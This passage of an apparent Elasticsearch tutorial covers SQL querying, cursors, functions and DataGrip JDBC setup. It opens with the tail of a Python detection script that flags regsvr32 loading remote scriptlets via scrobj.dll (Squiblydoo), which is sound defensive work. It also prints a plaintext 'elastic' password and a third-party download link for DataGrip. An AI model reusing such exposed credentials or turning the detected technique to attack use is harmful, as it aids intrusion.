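def process_creations(events, name="regsvr32.exe") -> list:
    return [e for e in events
            if field(e, "event.category") == "process"
            and field(e, "process.name") == name
            and field(e, "process.command_line") is not None]


# Step (4): library where process.name == "regsvr32.exe" and dll.name == "scrobj.dll"
def library_loads(events, name="regsvr32.exe", dll="scrobj.dll") -> list:
    return [e for e in events
            if field(e, "event.category") == "library"
            and field(e, "process.name") == name
            and field(e, "dll.name") == dll]


# The page's Squiblydoo indicator: regsvr32 handed a remote scriptlet (/i:<url>)
# together with scrobj.dll on the command line.
SCRIPTLET_ARGS = re.compile(r"/i:\s*https?://", re.IGNORECASE)


def squiblydoo_candidates(events) -> list:
    """Join steps (3) and (4) on process.entity_id, like
    `sequence by process.entity_id [process where ...] [library where ...]`:
    one record per process whose creation matched the indicator and was
    followed in time by a scrobj.dll load in the same process."""
    loads_by_entity = {}
    for e in library_loads(events):
        loads_by_entity.setdefault(field(e, "process.entity_id"), []).append(e["@timestamp"])
    hits = []
    for e in process_creations(events):
        if field(e, "event.type") != "creation":
            continue
        cmd = field(e, "process.command_line")
        if "scrobj.dll" not in cmd.lower() or not SCRIPTLET_ARGS.search(cmd):
            continue
        eid = field(e, "process.entity_id")
        later = [t for t in loads_by_entity.get(eid, []) if t >= e["@timestamp"]]
        if later:
            hits.append({"entity_id": eid, "pid": field(e, "process.pid"),
                         "parent": field(e, "process.parent.name"),
                         "command_line": cmd, "scrobj_loaded_at": min(later)})
    return hits


EVENTS = parse_events(SAMPLE_NDJSON)

if __name__ == "__main__":
    print("regsvr32 events:", count_process_events(EVENTS))
    for hit in squiblydoo_candidates(EVENTS):
        print("Squiblydoo candidate:", hit)
```

The second regsvr32 process in the sample registers a local DLL without a scriptlet URL and is correctly left out, which is the false-positive case a rule built only on process.name would not filter.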
4. SQL operations overview
(1) Overview
Elasticsearch is normally queried with the Query DSL; since Elasticsearch 6.3, Elasticsearch also supports SQL queries. Elasticsearch SQL is an X-Pack component that allows SQL-like queries to be executed against Elasticsearch in real time. Whether through the REST interface, the command line or JDBC, any client can use SQL to natively search and aggregate data in Elasticsearch. Elasticsearch SQL can be thought of as a translator that converts SQL into Query DSL. Elasticsearch SQL has the following characteristics:
Native support: Elasticsearch SQL is built specifically for Elasticsearch. No extra parts: no additional hardware, processes, runtime or dependency libraries are needed to query Elasticsearch; Elasticsearch SQL runs directly inside Elasticsearch. Lightweight and efficient: Elasticsearch SQL does not abstract away the search capabilities; instead it embraces SQL to expose full-text search, running full-text searches concisely and in real time.
(2) SQL vs Elasticsearch
Although SQL and Elasticsearch use different terminology for how data is organized (and have different semantics), their purpose is essentially the same. The mapping between the concepts is not exactly one-to-one and the semantics differ, but there is more in common than there are differences. In fact, many SQL concepts have a counterpart in Elasticsearch, and the terminology of the two is quite similar.
5. SQL basic syntax
(1) Data preparation
# Create the index and add data, equivalent to creating a table and its rows
PUT my-sql-index/_bulk?refresh
{ "index" : { "_id" : "JAVA" } }
{ "name" : "JAVA" , "author" : "zhangsan" , "release_date" : "2022-05-01" , "page_count" : 561 }
{ "index" : { "_id" : "BIGDATA" } }
{ "name" : "BIGDATA" , "author" : "lisi" , "release_date" : "2022-05-02" , "page_count" : 482 }
{ "index" : { "_id" : "SCALA" } }
{ "name" : "SCALA" , "author" : "wangwu" , "release_date" : "2022-05-03" , "page_count" : 604 }
# Response
{
"errors" : false ,
"took" : 276618497 ,
"items" : [
{
"index" : {
"_index" : "my-sql-index" ,
"_id" : "JAVA" ,
"_version" : 1 ,
"result" : "created" ,
"forced_refresh" : true ,
"_shards" : {
"total" : 2 ,
"successful" : 1 ,
"failed" : 0
} ,
"_seq_no" : 0 ,
"_primary_term" : 1 ,
"status" : 201
}
} ,
{
"index" : {
"_index" : "my-sql-index" ,
"_id" : "BIGDATA" ,
"_version" : 1 ,
"result" : "created" ,
"forced_refresh" : true ,
"_shards" : {
"total" : 2 ,
"successful" : 1 ,
"failed" : 0
} ,
"_seq_no" : 1 ,
"_primary_term" : 1 ,
"status" : 201
}
} ,
{
"index" : {
"_index" : "my-sql-index" ,
"_id" : "SCALA" ,
"_version" : 1 ,
"result" : "created" ,
"forced_refresh" : true ,
"_shards" : {
"total" : 2 ,
"successful" : 1 ,
"failed" : 0
} ,
"_seq_no" : 2 ,
"_primary_term" : 1 ,
"status" : 201
}
}
]
}
(2) The first SQL query
The format parameter controls the format of the returned result; the default is json.
txt: text format, easier to read at a glance. csv: comma-separated data. json: JSON data. tsv: tab-separated data. yaml: YAML property format.
# Request
POST _sql?format=txt
{
"query": """
SELECT * FROM "my-sql-index"
"""
}
# Response
author         |name           |page_count     |release_date
---------------+---------------+---------------+------------------------
zhangsan       |JAVA           |561            |2022-05-01T00:00:00.000Z
lisi           |BIGDATA        |482            |2022-05-02T00:00:00.000Z
wangwu         |SCALA          |604            |2022-05-03T00:00:00.000Z
(3) Conditional query
# Request
POST _sql?format=txt
{
"query": """
SELECT * FROM "my-sql-index" where page_count > 500
"""
}
# Response
author         |name           |page_count     |release_date
---------------+---------------+---------------+------------------------
zhangsan       |JAVA           |561            |2022-05-01T00:00:00.000Z
wangwu         |SCALA          |604            |2022-05-03T00:00:00.000Z
(4) Translating SQL into DSL
When the Query DSL is needed, the query can first be written in SQL and then converted through the Translate API; the result is the equivalent DSL query.
# Request
POST _sql/translate
{
"query": """
SELECT * FROM "my-sql-index" where page_count > 500
"""
}
# Response
{
"size" : 1000 ,
"query" : {
"range" : {
"page_count" : {
"gt" : 500 ,
"boost" : 1
}
}
} ,
"_source" : false ,
"fields" : [
{
"field" : "author"
} ,
{
"field" : "name"
} ,
{
"field" : "page_count"
} ,
{
"field" : "release_date" ,
"format" : "strict_date_optional_time_nanos"
}
] ,
"sort" : [
{
"_doc" : {
"order" : "asc"
}
}
] ,
"track_total_hits" : -1
}
(5) Mixing SQL and DSL
If a SQL statement still does not meet the query requirements after tuning, SQL and DSL can be combined: ES first runs the SQL query, then applies the DSL filter as a second pass over the SQL result.
# Mixing SQL and DSL
# Because the index name contains hyphens, it must be double-quoted when used as a table name, and the outer string must use triple quotes
POST _sql?format=txt
{
"query": """SELECT * FROM "my-sql-index" """,
"filter": {
"range": {
"page_count": {
"gte": 400,
"lte": 600
}
}
},
"fetch_size": 2
}
# Response
author         |name           |page_count     |release_date
---------------+---------------+---------------+------------------------
zhangsan       |JAVA           |561            |2022-05-01T00:00:00.000Z
lisi           |BIGDATA        |482            |2022-05-02T00:00:00.000Z
6. Common SQL operations
(1) List all indices
# Request
GET _sql?format=txt
{
"query": """
show tables
"""
}
# Response
catalog        |name                                              |type           |kind
---------------+--------------------------------------------------+---------------+---------------
elasticsearch  |.alerts-default.alerts-default                    |VIEW           |ALIAS
elasticsearch  |.alerts-ml.anomaly-detection-health.alerts-default|VIEW           |ALIAS
elasticsearch  |.alerts-ml.anomaly-detection.alerts-default       |VIEW           |ALIAS
elasticsearch  |.alerts-observability.apm.alerts-default          |VIEW           |ALIAS
elasticsearch  |.alerts-observability.logs.alerts-default         |VIEW           |ALIAS
elasticsearch  |.alerts-observability.metrics.alerts-default      |VIEW           |ALIAS
elasticsearch  |.alerts-observability.slo.alerts-default          |VIEW           |ALIAS
elasticsearch  |.alerts-observability.threshold.alerts-default    |VIEW           |ALIAS
elasticsearch  |.alerts-observability.uptime.alerts-default       |VIEW           |ALIAS
elasticsearch  |.alerts-security.alerts-default                   |VIEW           |ALIAS
elasticsearch  |.alerts-stack.alerts-default                      |VIEW           |ALIAS
elasticsearch  |.alerts-transform.health.alerts-default           |VIEW           |ALIAS
elasticsearch  |.kibana-observability-ai-assistant-conversations  |VIEW           |ALIAS
elasticsearch  |.kibana-observability-ai-assistant-kb             |VIEW           |ALIAS
elasticsearch  |.siem-signals-default                             |VIEW           |ALIAS
elasticsearch  |gmall                                             |TABLE          |INDEX
elasticsearch  |my-eql-index                                      |TABLE          |INDEX
elasticsearch  |my-sql-index                                      |TABLE          |INDEX
elasticsearch  |shopping                                          |TABLE          |INDEX
elasticsearch  |teacher                                           |TABLE          |INDEX
(2) Look up a specific index
# Request
GET _sql?format=txt
{
"query": """
show tables like 'my-eql-index'
"""
}
# Response
catalog        |name           |type           |kind
---------------+---------------+---------------+---------------
elasticsearch  |my-eql-index   |TABLE          |INDEX
(3) Look up indices by pattern
# Request
GET _sql?format=txt
{
"query": """
show tables like 'my-%'
"""
}
# Response
catalog        |name           |type           |kind
---------------+---------------+---------------+---------------
elasticsearch  |my-eql-index   |TABLE          |INDEX
elasticsearch  |my-sql-index   |TABLE          |INDEX
(4) View the index structure
# Request
GET _sql?format=txt
{
"query": """
describe "my-eql-index"
"""
}
# Response
column                           |type           |mapping
---------------------------------+---------------+---------------
@timestamp                       |BIGINT         |long
destination                      |STRUCT         |object
destination.address              |VARCHAR        |text
destination.address.keyword      |VARCHAR        |keyword
destination.port                 |VARCHAR        |text
destination.port.keyword         |VARCHAR        |keyword
dll                              |STRUCT         |object
dll.name                         |VARCHAR        |text
dll.name.keyword                 |VARCHAR        |keyword
dll.path                         |VARCHAR        |text
dll.path.keyword                 |VARCHAR        |keyword
event                            |STRUCT         |object
event.category                   |VARCHAR        |text
event.category.keyword           |VARCHAR        |keyword
event.type                       |VARCHAR        |text
event.type.keyword               |VARCHAR        |keyword
logon_id                         |BIGINT         |long
network                          |STRUCT         |object
network.direction                |VARCHAR        |text
network.direction.keyword        |VARCHAR        |keyword
network.protocol                 |VARCHAR        |text
network.protocol.keyword         |VARCHAR        |keyword
process                          |STRUCT         |object
process.command_line             |VARCHAR        |text
process.command_line.keyword     |VARCHAR        |keyword
process.entity_id                |VARCHAR        |text
process.entity_id.keyword        |VARCHAR        |keyword
process.executable               |VARCHAR        |text
process.executable.keyword       |VARCHAR        |keyword
process.name                     |VARCHAR        |text
process.name.keyword             |VARCHAR        |keyword
process.parent                   |STRUCT         |object
process.parent.entity_id         |VARCHAR        |text
process.parent.entity_id.keyword |VARCHAR        |keyword
process.parent.executable        |VARCHAR        |text
process.parent.executable.keyword|VARCHAR        |keyword
process.parent.name              |VARCHAR        |text
process.parent.name.keyword      |VARCHAR        |keyword
process.pid                      |BIGINT         |long
process.ppid                     |BIGINT         |long
registry                         |STRUCT         |object
registry.key                     |VARCHAR        |text
registry.key.keyword             |VARCHAR        |keyword
registry.path                    |VARCHAR        |text
registry.path.keyword            |VARCHAR        |keyword
registry.value                   |VARCHAR        |text
registry.value.keyword           |VARCHAR        |keyword
source                           |STRUCT         |object
source.address                   |VARCHAR        |text
source.address.keyword           |VARCHAR        |keyword
source.port                      |VARCHAR        |text
source.port.keyword              |VARCHAR        |keyword
user                             |STRUCT         |object
user.domain                      |VARCHAR        |text
user.domain.keyword              |VARCHAR        |keyword
user.full_name                   |VARCHAR        |text
user.full_name.keyword           |VARCHAR        |keyword
user.id                          |VARCHAR        |text
user.id.keyword                  |VARCHAR        |keyword
(5) Basic query operations
The syntax of SQL queries in ES is essentially the same as in a relational database; the general form is:
# Basic SQL syntax
SELECT select_expr [, ...]
[ FROM table_name ]
[ WHERE condition ]
[ GROUP BY grouping_element [, ...] ]
[ HAVING condition ]
[ ORDER BY expression [ ASC | DESC ] [, ...] ]
[ LIMIT [ count ] ]
[ PIVOT ( aggregation_expr FOR column IN ( value [ [ AS ] alias ] [, ...] ) ) ]
# Request
GET _sql?format=txt
{
"query": """
SELECT * FROM "my-sql-index"
"""
}
# Response
author         |name           |page_count     |release_date
---------------+---------------+---------------+------------------------
zhangsan       |JAVA           |561            |2022-05-01T00:00:00.000Z
lisi           |BIGDATA        |482            |2022-05-02T00:00:00.000Z
wangwu         |SCALA          |604            |2022-05-03T00:00:00.000Z
# Request
POST _sql?format=txt
{
"query": """SELECT * FROM "my-sql-index" where name = 'JAVA'"""
}
# Response
author         |name           |page_count     |release_date
---------------+---------------+---------------+------------------------
zhangsan       |JAVA           |561            |2022-05-01T00:00:00.000Z
# Request
GET _sql?format=txt
{
"query": """
SELECT release_date FROM "my-sql-index" group by release_date
"""
}
# Response
release_date
------------------------
2022-05-01T00:00:00.000Z
2022-05-02T00:00:00.000Z
2022-05-03T00:00:00.000Z
# Request
GET _sql?format=txt
{
"query": """
SELECT sum(page_count), release_date as datacnt FROM "my-sql-index" group by release_date having sum(page_count) > 600
"""
}
# Response
sum(page_count)|datacnt
---------------+------------------------
604            |2022-05-03T00:00:00.000Z
# Request
GET _sql?format=txt
{
"query": """
select * from "my-sql-index" order by page_count desc
"""
}
# Response
author         |name           |page_count     |release_date
---------------+---------------+---------------+------------------------
wangwu         |SCALA          |604            |2022-05-03T00:00:00.000Z
zhangsan       |JAVA           |561            |2022-05-01T00:00:00.000Z
lisi           |BIGDATA        |482            |2022-05-02T00:00:00.000Z
# Request
GET _sql?format=txt
{
"query": """
select * from "my-sql-index" limit 2
"""
}
# Response
author         |name           |page_count     |release_date
---------------+---------------+---------------+------------------------
zhangsan       |JAVA           |561            |2022-05-01T00:00:00.000Z
lisi           |BIGDATA        |482            |2022-05-02T00:00:00.000Z
cursor: a cursor is a data buffer that the system opens for the user to hold the result of a SQL statement. Each cursor has a name; the user fetches records from it one by one with SQL statements, assigns them to host variables and hands them to the host language for further processing. In essence, a cursor is a mechanism for extracting one or more records at a time from a result set that contains many records.
# Request
POST _sql?format=json
{
"query": """SELECT * FROM "my-sql-index" order by page_count desc""",
"fetch_size": 2
}
# Response, containing a cursor
{
"columns" : [
{
"name" : "author" ,
"type" : "text"
} ,
{
"name" : "name" ,
"type" : "text"
} ,
{
"name" : "page_count" ,
"type" : "long"
} ,
{
"name" : "release_date" ,
"type" : "datetime"
}
] ,
"rows" : [
[
"wangwu" ,
"SCALA" ,
604 ,
"2022-05-03T00:00:00.000Z"
] ,
[
"zhangsan" ,
"JAVA" ,
561 ,
"2022-05-01T00:00:00.000Z"
]
] ,
"cursor" : "spCTBERGTAB0kc9Kw0AQxmfWUCQUvOUqPkBA8U/xaFS0tlijVaqXZZtskoVkN91sSQQfQvBNxLuPpklMsR6cw/J9szsf/GbxCTABgtDUV11brYK6hXYkeBrSQmlj5yzmNFBLaaBHI6ELgwhopUrGP+/xAzeAkFo0R5uw14n2uslGq8eWJlEaiCVZxoGs55K+5ilnBachMxy3C6NFYFpDVW6EkiylRmScSiZVQfDl/fXNwn727BaL1BUy5JUzOHAf01Cc3lUj/3o2uRnfntHjEpxDLx8m51cLn2XD8dQ7GcaT/arsWHc+nfv5EfN2q8tpeFE+6MEomOfezAf8LxDAXi3MwqjDQsvwytSwUYv3a9cwVzvD6C/uZsPZ0NXj9R98AwAA//8DAA=="
}
# The cursor in the response identifies the buffer, so the remaining data can be fetched directly from it; the operation works somewhat like an iterator and can be repeated.
# The cursor value here must be replaced with the one returned by the reader's own request; do not use this value as-is
POST _sql?format=json
{
"cursor" : "spCTBERGTAB0kc9Kw0AQxmfWUCQUvOUqPkBA8U/xaFS0tlijVaqXZZtskoVkN91sSQQfQvBNxLuPpklMsR6cw/J9szsf/GbxCTABgtDUV11brYK6hXYkeBrSQmlj5yzmNFBLaaBHI6ELgwhopUrGP+/xAzeAkFo0R5uw14n2uslGq8eWJlEaiCVZxoGs55K+5ilnBachMxy3C6NFYFpDVW6EkiylRmScSiZVQfDl/fXNwn727BaL1BUy5JUzOHAf01Cc3lUj/3o2uRnfntHjEpxDLx8m51cLn2XD8dQ7GcaT/arsWHc+nfv5EfN2q8tpeFE+6MEomOfezAf8LxDAXi3MwqjDQsvwytSwUYv3a9cwVzvD6C/uZsPZ0NXj9R98AwAA//8DAA=="
}
# Response
{
"rows" : [
[
"lisi" ,
"BIGDATA" ,
482 ,
"2022-05-02T00:00:00.000Z"
]
]
}
# To close the buffer, run the following
POST _sql/close
{
"cursor" : "spCTBERGTAB0kc9Kw0AQxmfWUCQUvOUqPkBA8U/xaFS0tlijVaqXZZtskoVkN91sSQQfQvBNxLuPpklMsR6cw/J9szsf/GbxCTABgtDUV11brYK6hXYkeBrSQmlj5yzmNFBLaaBHI6ELgwhopUrGP+/xAzeAkFo0R5uw14n2uslGq8eWJlEaiCVZxoGs55K+5ilnBachMxy3C6NFYFpDVW6EkiylRmScSiZVQfDl/fXNwn727BaL1BUy5JUzOHAf01Cc3lUj/3o2uRnfntHjEpxDLx8m51cLn2XD8dQ7GcaT/arsWHc+nfv5EfN2q8tpeFE+6MEomOfezAf8LxDAXi3MwqjDQsvwytSwUYv3a9cwVzvD6C/uZsPZ0NXj9R98AwAA//8DAA=="
}
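The cursor exchange above (first request with query and fetch_size, follow-up requests carrying only the cursor, columns returned only on the first page, and _sql/close when the client stops early) as an added Python example; it is not code from the original page or from Elastic. `post` is assumed to be any callable taking (path, JSON body) and returning the decoded JSON, for instance a thin wrapper around requests.post against a real cluster; the FakeSqlServer here is a constructed stand-in so the exchange runs offline.

```python
"""Cursor-based paging for the Elasticsearch SQL API, with an offline stand-in server."""
from typing import Callable, Dict, List, Optional, Tuple

Post = Callable[[str, dict], dict]   # (path, JSON body) -> decoded JSON response


def fetch_all(post: Post, query: str, fetch_size: int = 2,
              max_rows: Optional[int] = None) -> Tuple[List[str], list]:
    """Return (column names, rows). Follows the cursor until the server stops
    returning one; if max_rows ends the loop early, the cursor is closed
    explicitly so the server-side buffer is not left open."""
    resp = post("/_sql?format=json", {"query": query, "fetch_size": fetch_size})
    columns = [c["name"] for c in resp["columns"]]   # only present on the first page
    rows = list(resp["rows"])
    while "cursor" in resp:
        if max_rows is not None and len(rows) >= max_rows:
            post("/_sql/close", {"cursor": resp["cursor"]})
            break
        resp = post("/_sql?format=json", {"cursor": resp["cursor"]})  # no query on later pages
        rows.extend(resp["rows"])
    return columns, (rows[:max_rows] if max_rows is not None else rows)


class FakeSqlServer:
    """Constructed stand-in for the _sql endpoint: serves the page's three
    documents ordered by page_count desc, fetch_size rows per page, and
    tracks which cursors are still open."""
    COLUMNS = [{"name": "author", "type": "text"}, {"name": "name", "type": "text"},
               {"name": "page_count", "type": "long"}, {"name": "release_date", "type": "datetime"}]
    ROWS = [["wangwu", "SCALA", 604, "2022-05-03T00:00:00.000Z"],
            ["zhangsan", "JAVA", 561, "2022-05-01T00:00:00.000Z"],
            ["lisi", "BIGDATA", 482, "2022-05-02T00:00:00.000Z"]]

    def __init__(self) -> None:
        self.open_cursors: Dict[str, Tuple[int, int]] = {}   # token -> (offset, fetch_size)
        self.closed: List[str] = []
        self.calls = 0

    def _page(self, offset: int, size: int, first: bool) -> dict:
        self.calls += 1
        page = {"rows": self.ROWS[offset:offset + size]}
        if first:
            page["columns"] = self.COLUMNS
        nxt = offset + size
        if nxt < len(self.ROWS):              # more rows remain: hand out an opaque token
            token = f"cursor-{nxt}"
            self.open_cursors[token] = (nxt, size)
            page["cursor"] = token
        return page

    def post(self, path: str, body: dict) -> dict:
        if path == "/_sql/close":
            self.open_cursors.pop(body["cursor"])
            self.closed.append(body["cursor"])
            return {"succeeded": True}
        if "cursor" in body:
            offset, size = self.open_cursors.pop(body["cursor"])   # cursors are single-use
            return self._page(offset, size, first=False)
        return self._page(0, body["fetch_size"], first=True)


if __name__ == "__main__":
    server = FakeSqlServer()
    cols, data = fetch_all(server.post, 'SELECT * FROM "my-sql-index" order by page_count desc')
    print(cols)
    for row in data:
        print(row)
    print("requests:", server.calls, "open cursors:", server.open_cursors)
```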
(6) Basic aggregation operations
The aggregation syntax of SQL queries in ES is essentially the same as in a relational database: Min: minimum; Max: maximum; Avg: average; Sum: total; Count(*): row count; Distinct: de-duplication.
# Request
GET _sql?format=txt
{
"query": """
SELECT
MIN(page_count) min, MAX(page_count) max, AVG(page_count) avg, SUM(page_count) sum, COUNT(*) count,
COUNT(DISTINCT name) distinct_count FROM "my-sql-index"
"""
}
# Response
min            |max            |avg            |sum            |count          |distinct_count
---------------+---------------+---------------+---------------+---------------+---------------
482            |604            |549.0          |1647           |3              |3
7. SQL functions and operators
(1) Comparison operators
# Equality
SELECT * FROM "my-sql-index" WHERE name = 'JAVA'
# Null-safe equality
SELECT 'elastic' <=> null AS "equals"
SELECT null <=> null AS "equals"
# Inequality
SELECT * FROM "my-sql-index" WHERE name <> 'JAVA'
SELECT * FROM "my-sql-index" WHERE name != 'JAVA'
# Comparison
SELECT * FROM "my-sql-index" WHERE page_count > 500
SELECT * FROM "my-sql-index" WHERE page_count >= 500
SELECT * FROM "my-sql-index" WHERE page_count < 500
SELECT * FROM "my-sql-index" WHERE page_count <= 500
# BETWEEN
SELECT * FROM "my-sql-index" WHERE page_count between 100 and 500
# IS NULL / IS NOT NULL
SELECT * FROM "my-sql-index" WHERE name is not null
SELECT * FROM "my-sql-index" WHERE name is null
# IN
SELECT * FROM "my-sql-index" WHERE name in ('JAVA', 'SCALA')
(2) Logical operators
# AND
SELECT * FROM "my-sql-index" WHERE name = 'JAVA' AND page_count > 100
# OR
SELECT * FROM "my-sql-index" WHERE name = 'JAVA' OR name = 'SCALA'
# NOT
SELECT * FROM "my-sql-index" WHERE NOT name = 'JAVA'
(3) Arithmetic operators
# Addition, subtraction, negation, multiplication, division, modulo
select 1 + 1 as x
select 1 - 1 as x
select -1 as x
select 6 * 6 as x
select 30 / 5 as x
select 30 % 7 as x
(4) Type casting
# Cast
SELECT '123'::long AS long
(5) Pattern matching
# LIKE wildcards
SELECT * FROM "my-sql-index" WHERE name like 'JAVA%'
SELECT * FROM "my-sql-index" WHERE name like 'JAVA_'
# To match a wildcard character literally, use an escape character
SELECT * FROM "my-sql-index" WHERE name like 'JAVA/%' ESCAPE '/'
# RLIKE: the R does not indicate a direction; it stands for Regex, a regular expression
SELECT * FROM "my-sql-index" WHERE name like 'JAV*A'
SELECT * FROM "my-sql-index" WHERE name rlike 'JAV*A'
# Although LIKE is a valid option for searching or filtering in Elasticsearch SQL, the full-text functions MATCH and QUERY are faster and more powerful and are the preferred alternative.
(6) Aggregate analysis functions
# FIRST / FIRST_VALUE: FIRST(field, ordering field)
SELECT first(name, release_date) FROM "my-sql-index"
SELECT first_value(substring(name, 2, 1)) FROM "my-sql-index"
# LAST / LAST_VALUE: LAST(field, ordering field)
SELECT last(name, release_date) FROM "my-sql-index"
SELECT last_value(substring(name, 2, 1)) FROM "my-sql-index"
# KURTOSIS: quantifies the peakedness of a field's distribution
SELECT KURTOSIS(page_count) FROM "my-sql-index"
# MAD: median absolute deviation
SELECT MAD(page_count) FROM "my-sql-index"
(7) Grouping functions
# HISTOGRAM: bucketed histogram
SELECT HISTOGRAM(page_count, 100) as c, count(*) FROM "my-sql-index" group by c
(8) General math functions
# ABS: absolute value of a number
select ABS(page_count) from "myindex" limit 5
# CBRT: cube root of a number, returns a double
select page_count v, CBRT(page_count) cbrt from "myindex" limit 5
# CEIL: the smallest integer (as a double) greater than or equal to the expression
select page_count v, CEIL(page_count) from "myindex" limit 5
# CEILING: same as CEIL
select page_count v, CEILING(page_count) from "myindex" limit 5
# E: returns Euler's number e (2.718281828459045); it takes no arguments
select page_count, E() from "myindex" limit 5
# ROUND: round to the nearest integer
select ROUND(-3.14)
# FLOOR: round down
select FLOOR(3.14)
# LOG: natural logarithm (base e)
select LOG(4)
# LOG10: base-10 logarithm
select LOG10(100)
# SQRT: square root of a non-negative real number
select SQRT(9)
# EXP: returns e (the base of the natural logarithm) raised to the power X
select EXP(3)
(9) Trigonometric functions
# DEGREES: converts X from radians to degrees
select DEGREES(x)
# RADIANS: converts X from degrees to radians
select RADIANS(x)
# SIN: sine of X
select SIN(x)
# COS: cosine of X, where X is given in radians
select COS(x)
# TAN: tangent of X, where X is given in radians
select TAN(x)
# ASIN: arcsine of X; X must be in the range -1 to 1, otherwise NULL is returned
select ASIN(x)
# ACOS: arccosine of X; X must be in the range -1 to 1, otherwise NULL is returned
select ACOS(x)
# ATAN: arctangent of X
select ATAN(x)
# SINH: hyperbolic sine of X
select SINH(x)
# COSH: hyperbolic cosine of X
select COSH(x)
(10) Date and time functions
# YEAR:
SELECT YEAR(CAST('2022-05-01T00:00:00Z' AS TIMESTAMP)) AS year
# MONTH_OF_YEAR() or MONTH():
SELECT MONTH(CAST('2022-05-01T00:00:00Z' AS TIMESTAMP)) AS month
# WEEK_OF_YEAR() or WEEK():
SELECT WEEK(CAST('2022-05-01T00:00:00Z' AS TIMESTAMP)) AS week
# DAY_OF_YEAR() or DOY(), equivalent to EXTRACT(<datetime_function> FROM <expression>):
SELECT DOY(CAST('2022-05-01T00:00:00Z' AS TIMESTAMP)) AS day
# DAY_OF_MONTH(), DOM() or DAY():
SELECT DAY(CAST('2022-05-01T00:00:00Z' AS TIMESTAMP)) AS day
# DAY_OF_WEEK() or DOW():
SELECT DOW(CAST('2022-05-01T00:00:00Z' AS TIMESTAMP)) AS day
# HOUR_OF_DAY() or HOUR():
SELECT HOUR(CAST('2022-05-01T00:00:00Z' AS TIMESTAMP)) AS hour
# MINUTE_OF_DAY():
SELECT MINUTE_OF_DAY(CAST('2022-05-01T00:00:00Z' AS TIMESTAMP)) AS minute
# MINUTE_OF_HOUR() or MINUTE():
SELECT MINUTE(CAST('2022-05-01T00:00:00Z' AS TIMESTAMP)) AS minute
# SECOND_OF_MINUTE() or SECOND():
SELECT SECOND(CAST('2022-05-01T00:00:00Z' AS TIMESTAMP)) AS second
(11) Full-text search functions
# MATCH: MATCH(field, pattern, options (optional))
SELECT * FROM "my-sql-index" where MATCH(name, 'JAVA')
SELECT * FROM "my-sql-index" where MATCH(name, 'java')
# MATCH over several fields: MATCH('field^boost1,field^boost2', pattern, options (optional))
SELECT * FROM "my-sql-index" where MATCH('author^2,name^5', 'java')
# QUERY
SELECT * FROM "my-sql-index" where QUERY('name:Java')
# SCORE: relevance score
SELECT *, score() FROM "my-sql-index" where QUERY('name:Java')
(12) String functions
# ASCII: ASCII code of the first character
SELECT ASCII('Elastic')
# BIT_LENGTH: length in bits
SELECT BIT_LENGTH('Elastic')
SELECT BIT_LENGTH('中国')
# CHAR: character for a code point
SELECT CHAR(69)
# CHAR_LENGTH: length in characters
SELECT CHAR_LENGTH('Elastic')
# CONCAT: concatenation
SELECT CONCAT('Elastic', 'search')
# INSERT: INSERT(string, start position, length, content to insert)
SELECT INSERT('Elastic', 8, 1, 'search')
SELECT INSERT('Elastic', 7, 1, 'search')
# LCASE: convert to lower case
SELECT LCASE('Elastic')
# LEFT: up to N characters from the left
SELECT LEFT('Elastic', 3)
# LENGTH
SELECT length('Elastic')
SELECT length('中国')
# LOCATE: LOCATE(pattern, string, start position), position of the first match
SELECT LOCATE('a', 'Elasticsearch')
SELECT LOCATE('a', 'Elasticsearch', 5)
# LTRIM: strip leading spaces
SELECT LTRIM(' Elastic')
# OCTET_LENGTH: length in bytes
SELECT OCTET_LENGTH('Elastic')
SELECT OCTET_LENGTH('中国')
# POSITION: position of the given substring
SELECT POSITION('Elastic', 'Elasticsearch')
# REPEAT: repeat the string the given number of times
SELECT REPEAT('Elastic', 3)
# REPLACE: replace content
SELECT REPLACE('Elastic', 'El', 'Fant')
# RIGHT: the given number of characters from the right
SELECT RIGHT('Elastic', 3)
# RTRIM: strip trailing spaces
SELECT RTRIM('Elastic ')
# SPACE: generate the given number of spaces
SELECT concat(SPACE(3), 'abc')
# STARTS_WITH: whether the string starts with the given prefix
SELECT STARTS_WITH('Elasticsearch', 'Elastic')
# SUBSTRING: extract a substring; all three arguments are required
SELECT SUBSTRING('Elasticsearch', 0, 7)
# TRIM: strip leading and trailing spaces
SELECT TRIM(' Elastic ') AS trimmed
# UCASE: convert to upper case
SELECT UCASE('Elastic')
(13) Conditional functions
# Multi-branch CASE
SELECT CASE 5
WHEN 1 THEN 'elastic'
WHEN 2 THEN 'search'
WHEN 3 THEN 'elasticsearch'
ELSE 'default'
END AS "case"
SELECT CASE WHEN 1 > 2 THEN 'elastic' WHEN 2 > 10 THEN 'search' ELSE 'default'
END AS "case"
# IFNULL
SELECT IFNULL('elastic', null) AS "ifnull"
SELECT IFNULL(null, 'search') AS "ifnull"
# IIF
SELECT IIF(1 < 2, 'TRUE', 'FALSE') AS result1, IIF(1 > 2, 'TRUE', 'FALSE') AS result2
# ISNULL
SELECT ISNULL('elastic', null) AS "isnull"
SELECT ISNULL(null, 'search') AS "isnull"
# LEAST: the smallest non-null value
SELECT LEAST(null, 2, 11) AS "least"
SELECT LEAST(null, null, null, null) AS "least"
# NULLIF: returns the first string if the two differ, null if they are equal
SELECT NULLIF('elastic', 'search') AS "nullif"
SELECT NULLIF('elastic', 'elastic') AS "nullif"
# NVL: returns the first non-null string, or null if both are null
SELECT NVL('elastic', null) AS "nvl"
SELECT NVL(null, null) AS "nvl"
(14) System functions
# ES cluster
SELECT DATABASE()
# User
SELECT USER()
8. SQL client: DataGrip
(1) Overview
DataGrip is a multi-engine database environment released by JetBrains; here DataGrip is used to connect to Elasticsearch. Download: https://www.jetbrains.com/datagrip/ Previous versions: https://www.jetbrains.com.cn/datagrip/download/other.html The version I installed this time is 2024.2.2: https://pan.baidu.com/s/1pBQ8lqx2CUc7QR4eN3yaBw?pwd=8888
(2) Configure the driver
First download the JDBC driver; here the 8.15 version matching ES is used. Download: https://www.elastic.co/downloads/past-releases/jdbc-client-8-15-0
(3) Configure the connection
Authentication: the username and password are the ES login credentials; username elastic, password 1yslqH3=VZBBZAwPbYeA. URL: jdbc:es://https://localhost:9200
Configure the certificate file path; the certificate automatically generated by ES can be used, found under config/certs in the ES configuration directory.
(4) Change the license type
By default the JDBC client requires a Platinum-level license; the default ES license is basic, with which this functionality cannot be used.
To use it, the current ES license can temporarily be set to a trial; after testing, switch back to basic. Note that the trial can be activated only once; using it again requires a reinstall, so proceed with care.
# View the current license
GET _license
# Response
{
"license" : {
"status" : "active" ,
"uid" : "e8528187-0dea-4955-81cb-4b90211a6d3b" ,
"type" : "basic" ,
"issue_date" : "2025-01-24T07:10:24.625Z" ,
